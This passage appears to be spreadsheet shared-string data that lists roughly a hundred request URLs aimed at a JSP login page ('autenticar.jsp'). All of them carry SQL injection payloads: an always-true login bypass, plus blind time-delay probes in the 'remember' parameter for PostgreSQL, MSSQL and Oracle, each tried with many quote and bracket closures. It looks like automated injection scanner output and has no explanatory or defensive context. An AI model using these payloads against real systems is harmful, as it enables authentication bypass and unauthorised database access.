    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and(("zzlu"like"zzlu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and1792=(selectcount(*)fromgenerate_series(1,5000000))--and((("zyvs"like"zyvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and1792=(selectcount(*)fromgenerate_series(1,5000000))--and"kecl"like"kecl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)waitfordelay'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')waitfordelay'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='waitfordelay'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="waitfordelay'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)waitfordelay'0:0:5'--and(6979=6979&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))waitfordelay'0:0:5'--and((2367=2367&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))waitfordelay'0:0:5'--and(((7186=7186&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=waitfordelay'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')waitfordelay'0:0:5'--and('bsmv'='bsmv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))waitfordelay'0:0:5'--and(('hmdg'='hmdg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))waitfordelay'0:0:5'--and((('wmch'='wmch&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='waitfordelay'0:0:5'--and'bliy'='bliy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')waitfordelay'0:0:5'--and('rscf'like'rscf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))waitfordelay'0:0:5'--and(('achq'like'achq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))waitfordelay'0:0:5'--and((('jtpf'like'jtpf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='waitfordelay'0:0:5'--and'skjm'like'skjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")waitfordelay'0:0:5'--and("dlrw"="dlrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))waitfordelay'0:0:5'--and(("oasd"="oasd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))waitfordelay'0:0:5'--and((("zreo"="zreo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="waitfordelay'0:0:5'--and"ftrn"="ftrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")waitfordelay'0:0:5'--and("xllb"like"xllb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))waitfordelay'0:0:5'--and(("aila"like"aila&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))waitfordelay'0:0:5'--and((("hwtu"like"hwtu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="waitfordelay'0:0:5'--and"yesj"like"yesj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(5218=5218&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((4696=4696&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(((9190=9190&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('jtgs'='jtgs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('fqxd'='fqxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('ujfa'='ujfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'kdxe'='kdxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('xhfe'like'xhfe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('dkjk'like'dkjk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('wzii'like'wzii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'wdmg'like'wdmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("ervn"="ervn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("oqxk"="oqxk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("hzds"="hzds&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"ovki"="ovki&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("jsiy"like"jsiy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("zmyq"like"zmyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("ppom"like"ppom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and571=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"xswe"like"xswe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(6871=6871&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((9778=9778&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(((2990=2990&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and('hqen'='hqen&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(('gfus'='gfus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((('mhbh'='mhbh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and'pcyv'='pcyv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and('gbsb'like'gbsb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(('ddcj'like'ddcj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((('brgb'like'brgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and'wshq'like'wshq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and("rrxb"="rrxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(("ufpc"="ufpc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((("vfus"="vfus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and"pzpi"="pzpi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and("biqs"like"biqs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(("mkfi"like"mkfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((("caxx"like"caxx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8526=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and"jdrc"like"jdrc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and(8913=8913&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and((6028=6028&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and(((2557=2557&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and('axpi'='axpi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and(('bbsz'='bbsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and((('ftlz'='ftlz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and'ozic'='ozic&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and('knli'like'knli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and(('pqon'like'pqon&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and((('prel'like'prel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and'hpvv'like'hpvv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and("bwbl"="bwbl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and(("oepf"="oepf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and((("ayhb"="ayhb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and"jvic"="jvic&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and("phwy"like"phwy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and(("tdbl"like"tdbl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and((("ntjf"like"ntjf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and4751=dbms_pipe.receive_message(chr(71)||chr(76)||chr(104)||chr(81),5)and"gkgl"like"gkgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and(3625=3625&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and((6392=6392&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and(((1429=1429&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and('dpzt'='dpzt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and(('pljo'='pljo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and((('qkio'='qkio&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and'hqeo'='hqeo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and7202=dbms_pipe.receive_message(chr(100)||chr(118)||chr(97)||chr(76),5)--and('sieu'like'sieu&amp;modo=entrar</t>
  </si>
  <si>
